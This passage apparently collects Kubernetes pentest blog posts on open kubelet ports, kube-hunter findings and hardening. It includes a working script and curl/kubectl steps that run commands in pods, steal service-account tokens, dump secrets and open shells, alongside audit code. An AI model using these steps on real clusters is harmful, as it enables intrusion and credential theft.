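The steps above (probe /runningpods/, tell the three responses apart, pull namespace/pod/container triples out of the PodList, build the /run URL and POST cmd=...) are mechanical enough to script, and the same PodList parsing applies to the /pods endpoint on the read-only 10255 port covered in the kube-hunter output further down. The following is an added example, not code from the original post: the PodList sample is constructed from the kube-dns pod shown above, k8s-node-1 is a placeholder hostname as in the post, and the live fetch is only run when a base URL is passed on the command line.

```python
"""Kubelet 10250/10255 enumeration helpers. Added example, not the post's code.
Parsing works offline on a PodList; fetch() is the only part that touches the network."""
import json
import ssl
import sys
import urllib.request
from typing import List, Optional, Tuple
from urllib.error import HTTPError, URLError
from urllib.parse import quote, urlencode

Target = Tuple[str, str, str]  # (namespace, pod, container)


def fetch(url: str, form: Optional[dict] = None, timeout: int = 10) -> Tuple[int, bytes]:
    """GET, or POST a form body when given; certificate checks off like curl -k."""
    ctx = ssl._create_unverified_context()
    data = urlencode(form).encode() if form is not None else None
    req = urllib.request.Request(url, data=data, method="POST" if data is not None else "GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read()
    except HTTPError as err:
        return err.code, err.read()
    except URLError as err:
        return 0, str(err.reason).encode()


def classify(status: int, body: bytes) -> str:
    """The three outcomes the post shows: 'Unauthorized' (anonymous auth off),
    'Forbidden ... user=system:anonymous' (anonymous accepted, then denied by the
    authorizer), or a PodList (open kubelet)."""
    text = body.decode(errors="replace").strip()
    if status == 0:
        return "unreachable"
    if status == 401 or text == "Unauthorized":
        return "auth-required"
    if status == 403 or text.startswith("Forbidden"):
        return "anonymous-denied"
    try:
        doc = json.loads(text)
    except ValueError:
        return "unknown"
    return "open" if isinstance(doc, dict) and doc.get("kind") == "PodList" else "unknown"


def pod_targets(podlist: dict) -> List[Target]:
    """Every (namespace, pod, container) on the node, from /runningpods/ (10250) or /pods (10255)."""
    out = []
    for item in podlist.get("items", []):
        meta = item.get("metadata", {})
        for c in item.get("spec", {}).get("containers", []):
            out.append((meta.get("namespace", "default"), meta["name"], c["name"]))
    return out


def secret_mounts(podlist: dict) -> List[Tuple[Target, str]]:
    """Containers that mount a secret volume, e.g. the service account token the
    post's output shows at /var/run/secrets/kubernetes.io/serviceaccount."""
    found = []
    for item in podlist.get("items", []):
        meta, spec = item.get("metadata", {}), item.get("spec", {})
        secret_vols = {v["name"] for v in spec.get("volumes", []) if "secret" in v}
        for c in spec.get("containers", []):
            for m in c.get("volumeMounts", []):
                if m["name"] in secret_vols:
                    found.append(((meta.get("namespace", "default"), meta["name"], c["name"]), m["mountPath"]))
    return found


def run_url(base: str, target: Target) -> str:
    """The /run/%namespace%/%pod_name%/%container_name% endpoint on 10250."""
    return base.rstrip("/") + "/run/" + "/".join(quote(part, safe="") for part in target)


def run_command(base: str, target: Target, cmd: str) -> Tuple[int, str]:
    """POST cmd=<command>, exactly what the post's curl -d "cmd=ls -la /" sends."""
    status, body = fetch(run_url(base, target), form={"cmd": cmd})
    return status, body.decode(errors="replace")


# Constructed PodList, trimmed from the kube-dns pod in the post's output (offline demo/test).
SAMPLE_PODLIST = {
    "kind": "PodList", "apiVersion": "v1",
    "items": [{
        "metadata": {"name": "kube-dns-5b8bf6c4f4-k5n2g", "namespace": "kube-system"},
        "spec": {
            "volumes": [{"name": "kube-dns-config", "configMap": {"name": "kube-dns"}},
                        {"name": "kube-dns-token-xznw5", "secret": {"secretName": "kube-dns-token-xznw5"}}],
            "containers": [{"name": "dnsmasq", "volumeMounts": [
                {"name": "kube-dns-config", "mountPath": "/etc/k8s/dns/dnsmasq-nanny"},
                {"name": "kube-dns-token-xznw5", "readOnly": True,
                 "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"}]}]}}]}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # live: python kubelet_enum.py https://k8s-node-1:10250
        base = sys.argv[1]
        status, body = fetch(base + "/runningpods/")
        verdict = classify(status, body)
        print(verdict)
        if verdict == "open":
            for target in pod_targets(json.loads(body)):
                print(target, run_command(base, target, "id"))
    else:
        for target in pod_targets(SAMPLE_PODLIST):
            print(run_url("https://k8s-node-1:10250", target))
        print(secret_mounts(SAMPLE_PODLIST))
```

Against a read-only 10255 port, feed classify() and pod_targets() the body of GET /pods instead; there is no /run there, but the secret_mounts() output tells you which container to target once you find a 10250 that is open.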

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html

Kubernetes: Kube-Hunter 10255

Below is some sample output, mainly to show what an open 10255 (the kubelet read-only port) gives you and what it looks like. Probably of most interest are the /pods endpoint, the /metrics endpoint and the /stats endpoint.

$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint
----------

Nodes
TYPE        | LOCATION
Node/Master | 1.2.3.4

Detected Services
SERVICE                | LOCATION      | DESCRIPTION
Kubelet API (readonly) | 1.2.3.4:10255 | The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes components
Etcd                   | 1.2.3.4:2379  | Etcd is a DB that stores cluster's data, it contains configuration and current state information, and might contain secrets
API Server             | 1.2.3.4:6443  | The API server is in charge of all operations on the cluster.
API Server             | 1.2.3.4:443   | The API server is in charge of all operations on the cluster.

Vulnerabilities
LOCATION      | CATEGORY               | VULNERABILITY                                       | DESCRIPTION                                                                                                                           | EVIDENCE
1.2.3.4:2379  | Unauthenticated Access | Etcd is accessible using insecure connection (HTTP) | Etcd is accessible using HTTP (without authorization and authentication), it would allow a potential attacker to gain access to the etcd | {"etcdserver":"2.3.8","etcdcluster":"2.3...
1.2.3.4:2379  | Information Disclosure | Etcd Remote version disclosure                      | Remote version disclosure might give an attacker a valuable data to attack a cluster                                                  | {"etcdserver":"2.3.8","etcdcluster":"2.3...
1.2.3.4:10255 | Information Disclosure | K8s Version Disclosure                              | The kubernetes version could be obtained from logs in the /metrics endpoint                                                           | v1.5.6-rc17
1.2.3.4:10255 | Information Disclosure | Exposed Pods                                        | An attacker could view sensitive information about pods that are bound to a Node using the /pods endpoint                             | count: 68
1.2.3.4:10255 | Information Disclosure | Cluster Health Disclosure                           | By accessing the open /healthz handler, an attacker could get the cluster health state without authenticating                         | status: ok
               | could get the        |                      ||                     |                      |                      | cluster health state |                      ||                     |                      |                      | without              |                      ||                     |                      |                      | authenticating       |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod ||                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node ||                     |                      |                      | attacker cluster’s   | …                  ||                     |                      |                      | possible exploits,   |                      ||                     |                      |                      | secrets and more.    |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  ||                     |                      |                      | container exist on a | 1fmd9-z9685,         ||                     |                      |                      | node. could expose   | containe…          ||                     |                      |                      | the node/cluster to  |                      ||                     |                      |                      | unwanted root        |                      ||                     |                      |                      | operations           |                      |+———————+———————-+———————-+———————-+———————-+

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started: do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods.

With that data, you can craft your POST request to exec within a pod so we can poke around. Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:

total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kubelet tokens are in the environment variables. Depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata URL

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kubelet (10250) won't know what to do with them. This may be (if we are lucky) another public IP or a 10. IP. If it's a 10. IP we need to download kubectl to the pod.

Assuming it's not in the environment variables, let's look and see if they are there in the mounted secrets:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:

cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.crt, namespace, and token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI--SNIP--

Also grab the ca.crt :-)

With the token, ca.crt and API server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI--SNIP-- get pods --all-namespaces

Output:

NAMESPACE     NAME                                               READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                      2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool    1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                             3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                  4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                         1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool               1/1       Running   1          2y
kube-system   kubernetes-dashboard-7-SNIP                        1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                         1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                       2/2       Running   0          120d

At this point you can pull secrets or exec into any available pods:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI--SNIP-- get secrets --all-namespaces

To get a shell via kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI--SNIP-- get pods --namespace=kube-system
NAME                                       READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI--SNIP-- /bin/sh
/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness, if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Kubernetes: List of ports

Other Kubernetes ports

What are some of the visible ports used in Kubernetes?

44134/tcp - Helm tiller, weave, calico
10250/tcp - kubelet (kubelet exploit)
    No authN, completely open
    /pods
    /runningpods
    /containerLogs
10255/tcp - kubelet port (read-only)
    /stats
    /metrics
    /pods
4194/tcp - cAdvisor
2379/tcp - etcd (see it on other ports though)
    Etcd holds all the configs
    Config storage
30000 - dashboard
443/6443 - api
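The two kubelet ports above (10250 with no authN, 10255 read-only with no auth at all) are controlled by a handful of KubeletConfiguration fields, so the fix is a config check rather than a firewall rule. The following is an added example, not code from the carnal0wnage posts: it audits a KubeletConfiguration for exactly those settings. Field names are the real kubelet.config.k8s.io/v1beta1 ones; WEAK_CFG and HARDENED_CFG are constructed dicts standing in for yaml.safe_load() of the kubelet config file, and the /var/lib/kubelet/config.yaml and /etc/kubernetes/pki/ca.crt paths are assumed common defaults, not taken from the posts.

```python
"""Audit a KubeletConfiguration for the unauthenticated-kubelet exposures
(10250 open to anonymous callers, 10255 read-only port enabled).

Added example, not from the original posts. Field names follow
kubelet.config.k8s.io/v1beta1; the two configs below are constructed and
stand in for yaml.safe_load(open("/var/lib/kubelet/config.yaml")).
"""

# Constructed: the shape of a node where kube-hunter would report 10250 and 10255.
WEAK_CFG = {
    "kind": "KubeletConfiguration",
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "port": 10250,
    "readOnlyPort": 10255,                 # unauthenticated /pods, /metrics, /stats
    "authentication": {
        "anonymous": {"enabled": True},    # system:anonymous may call /run, /exec, /containerLogs
        "webhook": {"enabled": False},
    },
    "authorization": {"mode": "AlwaysAllow"},
}

# Constructed: the same node with the exposures closed.
HARDENED_CFG = {
    "kind": "KubeletConfiguration",
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "port": 10250,
    "readOnlyPort": 0,                     # 0 disables the read-only port
    "authentication": {
        "anonymous": {"enabled": False},
        "webhook": {"enabled": True},      # bearer tokens are checked with the API server
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},  # assumed path
    },
    "authorization": {"mode": "Webhook"},  # SubjectAccessReview per request
}


def audit_kubelet_config(cfg):
    """Return a list of (code, detail) findings for one KubeletConfiguration.

    An empty list means none of the exposures discussed above are present.
    Missing fields are treated as the kubelet's v1beta1 defaults
    (anonymous enabled, AlwaysAllow, readOnlyPort 0)."""
    findings = []
    auth = cfg.get("authentication") or {}
    authz = cfg.get("authorization") or {}

    # 10250: anything other than an explicit false leaves anonymous requests on.
    if (auth.get("anonymous") or {}).get("enabled") is not False:
        findings.append(("anonymous-auth",
                         "authentication.anonymous.enabled is not false"))

    # With neither webhook auth nor a client CA, no caller can be identified at all.
    webhook_on = bool((auth.get("webhook") or {}).get("enabled"))
    client_ca = (auth.get("x509") or {}).get("clientCAFile")
    if not webhook_on and not client_ca:
        findings.append(("no-authenticator",
                         "neither webhook authentication nor x509 clientCAFile is set"))

    # AlwaysAllow makes authentication moot: every request is authorized.
    mode = authz.get("mode", "AlwaysAllow")
    if mode != "Webhook":
        findings.append(("authz-always-allow",
                         "authorization.mode should be Webhook, got %r" % mode))

    # 10255: the read-only port never authenticates; only 0 is safe.
    ro_port = cfg.get("readOnlyPort", 0)
    if ro_port:
        findings.append(("read-only-port", "readOnlyPort %d is open" % ro_port))

    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print(name, audit_kubelet_config(cfg) or "no findings")
```

Run it against every node's kubelet config (kubelet flags such as --anonymous-auth and --read-only-port override the file, so check the running process's arguments too); the weak config yields four findings and the hardened one none.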

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html

Kubernetes: Kubelet API containerLogs endpoint

How to get the info that kube-hunter reports for open /containerLogs endpoint

Vulnerabilities

| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
| 1.2.3.4:10250 | Information Disclosure | Exposed Container Logs | Output logs from a running container are using the exposed /containerLogs endpoint | |

First step, grab the output from /runningpods/ (example below). You'll need the namespace, pod name and container name. Thus given the below runningpods output:

{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},

turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana
and
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
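The namespace/pod/container mapping above, the "Privileged Container" row in the kube-hunter report earlier on this page, and the service-account token the 10250 walkthrough cats out of /var/run/secrets/kubernetes.io/serviceaccount all come from the same PodList JSON the kubelet serves. The following is an added example, not code from the posts, that parses that JSON into a per-container exposure inventory for an audit: which /containerLogs paths an open 10250 would expose, which containers run privileged, and which carry a mounted service-account token. SAMPLE_PODLIST is constructed: the first pod mirrors the grafana/influxdb pod in the post (its volumeMounts entry and token name are added, since the post's snippet is trimmed), and the second, a privileged node-exporter, is invented to trigger the privileged finding.

```python
"""Inventory what the kubelet's unauthenticated /pods and /runningpods
endpoints expose, from the PodList JSON shape shown above.

Added example, not code from the original posts. SAMPLE_PODLIST is
constructed; only the first pod's names and image digests come from the
post, its volumeMounts and the whole second pod are invented.
"""
import json

SA_MOUNT = "/var/run/secrets/kubernetes.io/serviceaccount"

SAMPLE_PODLIST = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {   # pod from the post; volumeMounts added for the example
            "metadata": {"name": "monitoring-influxdb-grafana-v4-6679c46745-zhvjw",
                         "namespace": "kube-system"},
            "spec": {"containers": [
                {"name": "grafana",
                 "image": "sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7",
                 "volumeMounts": [{"name": "default-token-constructed",
                                   "mountPath": SA_MOUNT, "readOnly": True}]},
                {"name": "influxdb",
                 "image": "sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c"},
            ]},
        },
        {   # constructed pod: privileged container, as in the kube-hunter row
            "metadata": {"name": "node-exporter-constructed-1", "namespace": "monitoring"},
            "spec": {"containers": [
                {"name": "node-exporter", "image": "example/node-exporter:constructed",
                 "securityContext": {"privileged": True}},
            ]},
        },
    ],
})


def inventory(podlist_json):
    """One record per container: location, privileged flag, SA token mount."""
    doc = json.loads(podlist_json)
    records = []
    for pod in doc.get("items", []):
        meta = pod.get("metadata") or {}
        spec = pod.get("spec") or {}
        for c in spec.get("containers", []):
            sec = c.get("securityContext") or {}
            mounts = c.get("volumeMounts") or []
            records.append({
                "namespace": meta.get("namespace"),
                "pod": meta.get("name"),
                "container": c["name"],
                "privileged": bool(sec.get("privileged")),
                "sa_token_mounted": any(m.get("mountPath") == SA_MOUNT for m in mounts),
            })
    return records


def exposed_log_paths(records):
    """The /containerLogs paths readable by anyone while 10250 is open,
    built with the same namespace/pod/container mapping shown above."""
    return ["/containerLogs/%s/%s/%s" % (r["namespace"], r["pod"], r["container"])
            for r in records]


def findings(records):
    """Conditions worth fixing: privileged containers, and containers that
    carry a mounted service-account token (set automountServiceAccountToken:
    false on pods that do not need API access)."""
    out = []
    for r in records:
        where = "%s/%s/%s" % (r["namespace"], r["pod"], r["container"])
        if r["privileged"]:
            out.append(("privileged-container", where))
        if r["sa_token_mounted"]:
            out.append(("sa-token-mounted", where))
    return out


if __name__ == "__main__":
    recs = inventory(SAMPLE_PODLIST)
    for path in exposed_log_paths(recs):
        print("exposed:", path)
    for code, where in findings(recs):
        print(code, where)
```

Feed it the /pods document from each node (after the kubelet is locked down, via an authenticated client) to get a cluster-wide list of log paths that were exposed and of pods whose tokens should be treated as at risk.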

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html

Kubernetes: Kubernetes Dashboard

Tesla was famously hacked for leaving this open and it's pretty rare to find it exposed externally now, but it is useful to know what it is and what you can do with it.

Usually found on port 30000.

kube-hunter finding for it:

Vulnerabilities

| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
| 1.2.3.4:30000 | Remote Code Execution | Dashboard Exposed | All oprations on the cluster are exposed | nodes: pach-okta |

Why do you care? It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like (images not reproduced here): viewing secrets, utilization, logs, shells.

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html